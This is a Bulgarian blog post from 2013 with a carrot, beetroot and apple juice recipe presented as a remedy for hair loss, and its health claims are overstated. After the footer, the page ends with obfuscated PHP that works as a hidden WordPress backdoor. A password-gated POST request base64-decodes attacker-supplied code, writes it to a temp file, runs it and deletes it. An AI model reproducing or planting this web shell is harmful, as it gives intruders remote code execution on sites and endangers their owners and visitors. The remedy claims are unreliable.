Сок от зеленчуци срещу косопад | Косопад

Сок от зеленчуци срещу косопад

Моркови, червено цвекло и ябълка са съставки, с които да си направите сок, който ще ви помогне да спрете косопада.

С идването на пролетта или есента, мъже и жени започват масово да се притесняват за количеството коса по възглавницата, гребена, душа и др. Въпреки че това е естествен процес от капилярния цикъл, може да бъде победен от също натурални съставки, които да заздравят корена на косъма и да направят косата ви брилянтна.

сок

Съставки за сока срещу косопад:

– 2 моркова
– Половин прясно червено цвекло
– 1 ябълка

Начин на приготвяне:

Обелете морковите, измийте цвеклото и почистете отвътре ябълката. Нарежете всичките съставки на парчета и ги сложете в сокоизтисвачката.

Пийте сока всеки ден. Може да го приемате преди хранене, като следобедна закуска или като сутрешна закуска, на гладно. сок1Така ще започвате деня с много енергия.

Освен това, тази напитка, която е много богата на желязо и витамини В, подобрява състоянието на хора с анемия и намалява нивата на стреса – две състояния, които също водят до косопад. Морковът, който е богат на бетакаротени, ще направи кожата ви красива и е особено полезен, когато се излагате на силно слънце.

Добре е освен сока, да си правите масажи на главата, които също помагат за спирането или поне намаляването на косопада, както и за енергизирането на косата.

12. декември 2013 18:09:34 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}